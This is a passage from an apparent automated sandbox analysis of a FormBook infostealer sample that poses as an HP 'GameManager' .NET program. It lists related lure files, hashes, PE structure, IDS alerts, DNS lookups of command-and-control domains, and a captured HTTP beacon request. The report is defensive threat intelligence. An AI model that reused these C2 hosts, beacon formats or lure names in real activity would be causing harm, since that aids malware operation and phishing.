                                    www.pxwuo.comvbc.exe.exeGet hashmaliciousBrowse
                                    • 185.107.56.58

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    GOOGLEUSYvGnm93rap.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    ACH WIRE PAYMENT ADVICE..xlsxGet hashmaliciousBrowse
                                    • 108.177.126.132
                                    VFe7Yb7gUV.exeGet hashmaliciousBrowse
                                    • 8.8.8.8
                                    cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                    • 216.239.38.21
                                    Order_00009.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    13-01-21.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                    • 108.177.127.132
                                    Order_385647584.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    rB26M8hfIh.exeGet hashmaliciousBrowse
                                    • 8.8.8.8
                                    brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                    • 216.239.34.21
                                    WFLPGBTMZH.dllGet hashmaliciousBrowse
                                    • 108.177.126.132
                                    PO#218740.exeGet hashmaliciousBrowse
                                    • 34.98.99.30
                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    20210113155320.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    13012021.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                    • 35.204.150.5
                                    6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    BODIS-NJUSPO85937758859777.xlsxGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    PO#218740.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    c6Rg7xug26.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    sample20210111-01.xlsmGet hashmaliciousBrowse
                                    • 199.59.242.150
                                    IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    mQFXD5FxGT.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    099898892.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    990109.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    SAWR000148651.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    IRS Notice Letter.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    IRS Notice Letter.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    Payment Order Inv.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    h3dFAROdF3.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    kqwqyoFz1C.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    file.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    PByYRsoSNX.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    GOOGLEUSYvGnm93rap.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    ACH WIRE PAYMENT ADVICE..xlsxGet hashmaliciousBrowse
                                    • 108.177.126.132
                                    VFe7Yb7gUV.exeGet hashmaliciousBrowse
                                    • 8.8.8.8
                                    cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                    • 216.239.38.21
                                    Order_00009.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    13-01-21.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    PO85937758859777.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                    • 108.177.127.132
                                    Order_385647584.xlsxGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    rB26M8hfIh.exeGet hashmaliciousBrowse
                                    • 8.8.8.8
                                    brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                    • 216.239.34.21
                                    WFLPGBTMZH.dllGet hashmaliciousBrowse
                                    • 108.177.126.132
                                    PO#218740.exeGet hashmaliciousBrowse
                                    • 34.98.99.30
                                    20210111 Virginie.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    20210113155320.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    13012021.exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                    • 34.102.136.180
                                    FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                    • 35.204.150.5
                                    6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                    • 34.102.136.180

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\65BV6gbGFl.exe.log
                                    Process:C:\Users\user\Desktop\65BV6gbGFl.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1406
                                    Entropy (8bit):5.341099307467139
                                    Encrypted:false
                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                    MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                    SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                    SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                    SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.421215500081907
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:65BV6gbGFl.exe
                                    File size:724992
                                    MD5:deed11e2b4b23dbe0c9ef99b5390bd6f
                                    SHA1:158662003b5e63c1419267d5e8b0d4ce79e72081
                                    SHA256:326090842ee6d692e02ae131a2003658939f60e79bceb7bad983cfe16400062f
                                    SHA512:380a473f9e6ce25e5e68ac15794d1bcbe125a887067a48c258abb625b96080d90fad32cb860043af4b32d4d8afc84365726e4a861ec03976a6bec7651d3e0380
                                    SSDEEP:12288:OtLwdpZjqiPvkQTTHFXRlcBieP76JVPchyZTI7:OtLwd3hkUThRlcMeDAPky1I7
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-._..............P.............z#... ...@....@.. ....................................@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x4b237a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x5FFE2DBE [Tue Jan 12 23:16:14 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb23280x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x608.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xb03800xb0400False0.756322030142data7.4280270646IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0xb40000x6080x800False0.33154296875data3.4417850477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xb60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0xb40900x378data
                                    RT_MANIFEST0xb44180x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyrightCopyright Hewlett-Packard 2016
                                    Assembly Version1.0.0.0
                                    InternalNameUnicodeCategory.exe
                                    FileVersion1.0.0.0
                                    CompanyNameHewlett-Packard
                                    LegalTrademarks
                                    Comments
                                    ProductNameGameManager
                                    ProductVersion1.0.0.0
                                    FileDescriptionGameManager
                                    OriginalFilenameUnicodeCategory.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    01/13/21-20:54:48.906574TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.434.102.136.180
                                    01/13/21-20:54:48.906574TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.434.102.136.180
                                    01/13/21-20:54:48.906574TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.434.102.136.180
                                    01/13/21-20:54:49.045676TCP1201ATTACK-RESPONSES 403 Forbidden804977134.102.136.180192.168.2.4
                                    01/13/21-20:55:09.354315TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.186.238.101
                                    01/13/21-20:55:09.354315TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.186.238.101
                                    01/13/21-20:55:09.354315TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.435.186.238.101
                                    01/13/21-20:55:09.493736TCP1201ATTACK-RESPONSES 403 Forbidden804977235.186.238.101192.168.2.4

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2021 20:53:44.313553095 CET4976780192.168.2.4199.59.242.153
                                    Jan 13, 2021 20:53:44.437000036 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.437124968 CET4976780192.168.2.4199.59.242.153
                                    Jan 13, 2021 20:53:44.437371016 CET4976780192.168.2.4199.59.242.153
                                    Jan 13, 2021 20:53:44.559900045 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.560323954 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.560359001 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.560375929 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.560388088 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.560405016 CET8049767199.59.242.153192.168.2.4
                                    Jan 13, 2021 20:53:44.560498953 CET4976780192.168.2.4199.59.242.153
                                    Jan 13, 2021 20:53:44.560578108 CET4976780192.168.2.4199.59.242.153
                                    Jan 13, 2021 20:53:44.560594082 CET4976780192.168.2.4199.59.242.153
                                    Jan 13, 2021 20:54:28.221752882 CET4977080192.168.2.4185.107.56.57
                                    Jan 13, 2021 20:54:28.273900986 CET8049770185.107.56.57192.168.2.4
                                    Jan 13, 2021 20:54:28.274128914 CET4977080192.168.2.4185.107.56.57
                                    Jan 13, 2021 20:54:28.274372101 CET4977080192.168.2.4185.107.56.57
                                    Jan 13, 2021 20:54:28.326505899 CET8049770185.107.56.57192.168.2.4
                                    Jan 13, 2021 20:54:28.352443933 CET8049770185.107.56.57192.168.2.4
                                    Jan 13, 2021 20:54:28.352492094 CET8049770185.107.56.57192.168.2.4
                                    Jan 13, 2021 20:54:28.352781057 CET4977080192.168.2.4185.107.56.57
                                    Jan 13, 2021 20:54:28.352854967 CET4977080192.168.2.4185.107.56.57
                                    Jan 13, 2021 20:54:28.405164957 CET8049770185.107.56.57192.168.2.4
                                    Jan 13, 2021 20:54:48.865446091 CET4977180192.168.2.434.102.136.180
                                    Jan 13, 2021 20:54:48.905697107 CET804977134.102.136.180192.168.2.4
                                    Jan 13, 2021 20:54:48.905880928 CET4977180192.168.2.434.102.136.180
                                    Jan 13, 2021 20:54:48.906574011 CET4977180192.168.2.434.102.136.180
                                    Jan 13, 2021 20:54:48.946842909 CET804977134.102.136.180192.168.2.4
                                    Jan 13, 2021 20:54:49.045675993 CET804977134.102.136.180192.168.2.4
                                    Jan 13, 2021 20:54:49.045726061 CET804977134.102.136.180192.168.2.4
                                    Jan 13, 2021 20:54:49.046830893 CET4977180192.168.2.434.102.136.180
                                    Jan 13, 2021 20:54:49.046881914 CET4977180192.168.2.434.102.136.180
                                    Jan 13, 2021 20:54:49.087105036 CET804977134.102.136.180192.168.2.4
                                    Jan 13, 2021 20:55:09.312593937 CET4977280192.168.2.435.186.238.101
                                    Jan 13, 2021 20:55:09.353492975 CET804977235.186.238.101192.168.2.4
                                    Jan 13, 2021 20:55:09.354161024 CET4977280192.168.2.435.186.238.101
                                    Jan 13, 2021 20:55:09.354315042 CET4977280192.168.2.435.186.238.101
                                    Jan 13, 2021 20:55:09.394794941 CET804977235.186.238.101192.168.2.4
                                    Jan 13, 2021 20:55:09.493736029 CET804977235.186.238.101192.168.2.4
                                    Jan 13, 2021 20:55:09.493757963 CET804977235.186.238.101192.168.2.4
                                    Jan 13, 2021 20:55:09.494088888 CET4977280192.168.2.435.186.238.101
                                    Jan 13, 2021 20:55:09.494133949 CET4977280192.168.2.435.186.238.101
                                    Jan 13, 2021 20:55:09.535023928 CET804977235.186.238.101192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2021 20:52:32.172439098 CET5309753192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:32.220647097 CET53530978.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:33.311542034 CET4925753192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:33.362231016 CET53492578.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:34.139444113 CET6238953192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:34.198728085 CET53623898.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:45.836869001 CET4991053192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:45.884936094 CET53499108.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:47.007227898 CET5585453192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:47.068545103 CET53558548.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:47.839284897 CET6454953192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:47.887299061 CET53645498.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:49.508745909 CET6315353192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:49.556660891 CET53631538.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:50.455024004 CET5299153192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:50.504972935 CET53529918.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:52.701364994 CET5370053192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:52.749363899 CET53537008.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:56.128134012 CET5172653192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:56.176105976 CET53517268.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:57.259047031 CET5679453192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:57.307245970 CET53567948.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:58.051714897 CET5653453192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:58.099634886 CET53565348.8.8.8192.168.2.4
                                    Jan 13, 2021 20:52:58.928165913 CET5662753192.168.2.48.8.8.8
                                    Jan 13, 2021 20:52:58.978955984 CET53566278.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:00.063397884 CET5662153192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:00.114160061 CET53566218.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:00.840970039 CET6311653192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:00.888778925 CET53631168.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:01.630445957 CET6407853192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:01.690609932 CET53640788.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:01.705905914 CET6480153192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:01.753698111 CET53648018.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:02.493494034 CET6172153192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:02.541580915 CET53617218.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:17.430368900 CET5125553192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:17.505547047 CET53512558.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:18.070466042 CET6152253192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:18.129807949 CET53615228.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:18.712552071 CET5233753192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:18.756772041 CET5504653192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:18.768822908 CET53523378.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:18.821151972 CET53550468.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:19.214831114 CET4961253192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:19.262551069 CET53496128.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:19.707700014 CET4928553192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:19.812750101 CET53492858.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:20.366203070 CET5060153192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:20.425740957 CET53506018.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:22.382091045 CET6087553192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:22.445713043 CET53608758.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:23.184957981 CET5644853192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:23.243670940 CET53564488.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:24.899250984 CET5917253192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:24.960870981 CET53591728.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:25.380939007 CET6242053192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:25.437536955 CET53624208.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:35.261080027 CET6057953192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:35.319004059 CET53605798.8.8.8192.168.2.4
                                    Jan 13, 2021 20:53:44.166389942 CET5018353192.168.2.48.8.8.8
                                    Jan 13, 2021 20:53:44.306123972 CET53501838.8.8.8192.168.2.4
                                    Jan 13, 2021 20:54:05.227828979 CET6153153192.168.2.48.8.8.8
                                    Jan 13, 2021 20:54:05.351418018 CET53615318.8.8.8192.168.2.4
                                    Jan 13, 2021 20:54:07.734181881 CET4922853192.168.2.48.8.8.8
                                    Jan 13, 2021 20:54:07.784997940 CET53492288.8.8.8192.168.2.4
                                    Jan 13, 2021 20:54:09.728710890 CET5979453192.168.2.48.8.8.8
                                    Jan 13, 2021 20:54:09.784900904 CET53597948.8.8.8192.168.2.4
                                    Jan 13, 2021 20:54:28.149769068 CET5591653192.168.2.48.8.8.8
                                    Jan 13, 2021 20:54:28.220410109 CET53559168.8.8.8192.168.2.4
                                    Jan 13, 2021 20:54:48.799761057 CET5275253192.168.2.48.8.8.8
                                    Jan 13, 2021 20:54:48.862910032 CET53527528.8.8.8192.168.2.4
                                    Jan 13, 2021 20:55:09.225584030 CET6054253192.168.2.48.8.8.8
                                    Jan 13, 2021 20:55:09.311608076 CET53605428.8.8.8192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jan 13, 2021 20:53:44.166389942 CET192.168.2.48.8.8.80x47b1Standard query (0)www.fallguysmovile.comA (IP address)IN (0x0001)
                                    Jan 13, 2021 20:54:05.227828979 CET192.168.2.48.8.8.80xa164Standard query (0)www.gidagozlemevi.comA (IP address)IN (0x0001)
                                    Jan 13, 2021 20:54:28.149769068 CET192.168.2.48.8.8.80xdc1aStandard query (0)www.pxwuo.comA (IP address)IN (0x0001)
                                    Jan 13, 2021 20:54:48.799761057 CET192.168.2.48.8.8.80xb058Standard query (0)www.outlawgospelshow.comA (IP address)IN (0x0001)
                                    Jan 13, 2021 20:55:09.225584030 CET192.168.2.48.8.8.80xdb85Standard query (0)www.karybeautycare.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jan 13, 2021 20:53:44.306123972 CET8.8.8.8192.168.2.40x47b1No error (0)www.fallguysmovile.com199.59.242.153A (IP address)IN (0x0001)
                                    Jan 13, 2021 20:54:05.351418018 CET8.8.8.8192.168.2.40xa164Server failure (2)www.gidagozlemevi.comnonenoneA (IP address)IN (0x0001)
                                    Jan 13, 2021 20:54:28.220410109 CET8.8.8.8192.168.2.40xdc1aNo error (0)www.pxwuo.com185.107.56.57A (IP address)IN (0x0001)
                                    Jan 13, 2021 20:54:48.862910032 CET8.8.8.8192.168.2.40xb058No error (0)www.outlawgospelshow.comoutlawgospelshow.comCNAME (Canonical name)IN (0x0001)
                                    Jan 13, 2021 20:54:48.862910032 CET8.8.8.8192.168.2.40xb058No error (0)outlawgospelshow.com34.102.136.180A (IP address)IN (0x0001)
                                    Jan 13, 2021 20:55:09.311608076 CET8.8.8.8192.168.2.40xdb85No error (0)www.karybeautycare.com35.186.238.101A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.fallguysmovile.com
                                    • www.pxwuo.com
                                    • www.outlawgospelshow.com
                                    • www.karybeautycare.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.449767199.59.242.15380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 13, 2021 20:53:44.437371016 CET5202OUTGET /kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv HTTP/1.1
                                    Host: www.fallguysmovile.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Jan 13, 2021 20:53:44.560323954 CET5203INHTTP/1.1 200 OK
                                    Server: openresty
                                    Date: Wed, 13 Jan 2021 19:53:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PIYaJvvCi/reJjNqhO1/O4DdG1EQVRSrHg3NskSDV5y/KRHk5Dehu0mykr54Lfo9LurRuSqm77QCNr+FUQs7qA==
